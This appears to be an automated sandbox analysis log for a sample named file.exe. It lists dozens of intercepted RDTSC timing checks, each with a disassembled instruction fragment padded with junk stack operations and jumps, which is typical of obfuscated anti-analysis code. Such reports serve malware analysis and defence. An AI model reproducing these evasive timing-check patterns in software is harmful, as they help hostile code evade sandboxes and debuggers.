                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888CFC second address: 888D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 or ecx, 273FEB8Fh 0x0000000f push 00000004h 0x00000011 sbb di, CD87h 0x00000016 jmp 00007FF17CC823B5h 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007FF17CC823B6h 0x00000024 jng 00007FF17CC823A6h 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888D48 second address: 888D77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF17CBED4F9h 0x00000008 je 00007FF17CBED4E6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FF17CBED4E6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889409 second address: 88940E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88940E second address: 889423 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF17CBED4F0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889423 second address: 88943C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF17CC823AFh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88943C second address: 889446 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF17CBED4ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889446 second address: 889455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889455 second address: 88945A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889561 second address: 8895AF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a lea eax, dword ptr [ebp+12488037h] 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FF17CC823A8h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov ecx, dword ptr [ebp+122D3044h] 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FF17CC823B3h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8895AF second address: 8895CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007FF17CBED4E6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FF17CBED4ECh 0x00000017 jo 00007FF17CBED4E6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8895CC second address: 8690C5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF17CC823ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D188Ah], ebx 0x00000011 lea eax, dword ptr [ebp+12487FF3h] 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007FF17CC823A8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 jmp 00007FF17CC823B9h 0x00000036 nop 0x00000037 jnp 00007FF17CC823AAh 0x0000003d push eax 0x0000003e jmp 00007FF17CC823B6h 0x00000043 nop 0x00000044 movzx ecx, dx 0x00000047 sub edx, dword ptr [ebp+122D1C0Bh] 0x0000004d call dword ptr [ebp+12451296h] 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C348A second address: 8C34B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnp 00007FF17CBED4E8h 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FF17CBED4F7h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C34B7 second address: 8C34BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C34BD second address: 8C34C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C34C1 second address: 8C34C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C39DB second address: 8C39E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FF17CBED4E6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C39E7 second address: 8C39ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3B2D second address: 8C3B33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7A54 second address: 8C7A58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7A58 second address: 8C7A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7A5E second address: 8C7A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7A68 second address: 8C7A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7A6E second address: 8C7A7D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007FF17CC823A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8443F0 second address: 844419 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4F7h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c je 00007FF17CBED4E6h 0x00000012 pushad 0x00000013 popad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844419 second address: 84445D instructions: 0x00000000 rdtsc 0x00000002 je 00007FF17CC823BEh 0x00000008 jmp 00007FF17CC823B8h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF17CC823B1h 0x00000014 jmp 00007FF17CC823B1h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84445D second address: 844461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844461 second address: 844467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844467 second address: 844498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FF17CBED4F0h 0x0000000f jbe 00007FF17CBED4E6h 0x00000015 popad 0x00000016 jnc 00007FF17CBED4E8h 0x0000001c push eax 0x0000001d push edx 0x0000001e jng 00007FF17CBED4E6h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9E89 second address: 8C9E8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9E8D second address: 8C9E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jl 00007FF17CBED50Bh 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9E9D second address: 8C9EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FF17CC823ADh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9EB4 second address: 8C9EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9A3E second address: 8C9A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9A42 second address: 8C9A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FF17CBED4EEh 0x0000000c jnl 00007FF17CBED4E6h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007FF17CBED4E6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9B9A second address: 8C9B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9B9F second address: 8C9BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9BA5 second address: 8C9BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9BA9 second address: 8C9BE3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF17CBED4E6h 0x00000008 jmp 00007FF17CBED4F4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF17CBED4F8h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83378C second address: 833790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CC58F second address: 8CC593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CC593 second address: 8CC597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CC70F second address: 8CC713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CC9D9 second address: 8CC9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CC9E8 second address: 8CC9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D242F second address: 8D2441 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2441 second address: 8D2449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1F8C second address: 8D1F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1F90 second address: 8D1F94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1F94 second address: 8D1F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1F9E second address: 8D1FA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D65A9 second address: 8D65AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D65AD second address: 8D65CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FF17CBED4EAh 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D65CA second address: 8D65D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6723 second address: 8D6728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6CCA second address: 8D6CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6CCE second address: 8D6CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6CD2 second address: 8D6CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DAAAC second address: 8DAAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E293D second address: 8E2944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E0B00 second address: 8E0B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E0B06 second address: 8E0B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E120F second address: 8E1215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E59E2 second address: 8E5A13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823B5h 0x00000007 je 00007FF17CC823A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnp 00007FF17CC823B2h 0x00000015 jg 00007FF17CC823A6h 0x0000001b jc 00007FF17CC823A6h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5CF8 second address: 8E5CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5CFD second address: 8E5D2E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF17CC823B1h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jg 00007FF17CC823A6h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF17CC823ABh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5D2E second address: 8E5D41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5D41 second address: 8E5D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5D47 second address: 8E5D53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5D53 second address: 8E5D59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E60C0 second address: 8E60E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FF17CBED4F1h 0x0000000e jne 00007FF17CBED4E6h 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E60E4 second address: 8E60F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FF17CC823A6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E60F1 second address: 8E6103 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF17CBED4E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FF17CBED4E6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E6103 second address: 8E613B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823B6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c js 00007FF17CC823BFh 0x00000012 jmp 00007FF17CC823ADh 0x00000017 jo 00007FF17CC823ACh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E6267 second address: 8E6276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jno 00007FF17CBED4E6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E6276 second address: 8E6283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FF17CC823A6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E6283 second address: 8E628F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E628F second address: 8E62AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF17CC823A6h 0x0000000a jg 00007FF17CC823A6h 0x00000010 popad 0x00000011 jne 00007FF17CC823A8h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E6461 second address: 8E646A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F2751 second address: 8F275A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0E87 second address: 8F0E91 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF17CBED4E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0E91 second address: 8F0E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0E9A second address: 8F0EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0FBF second address: 8F0FD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007FF17CC823ACh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0FD3 second address: 8F0FD8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F127A second address: 8F1280 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F1415 second address: 8F141B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F141B second address: 8F1426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F1426 second address: 8F1465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF17CBED4F3h 0x00000009 jmp 00007FF17CBED4F8h 0x0000000e jc 00007FF17CBED4E6h 0x00000014 popad 0x00000015 push ecx 0x00000016 jnl 00007FF17CBED4E6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F1E6F second address: 8F1E75 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F25B1 second address: 8F25E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF17CBED4ECh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FF17CBED4F8h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F03FA second address: 8F0414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 push ebx 0x00000008 jmp 00007FF17CC823B0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0414 second address: 8F0435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FF17CBED4F2h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0435 second address: 8F0439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
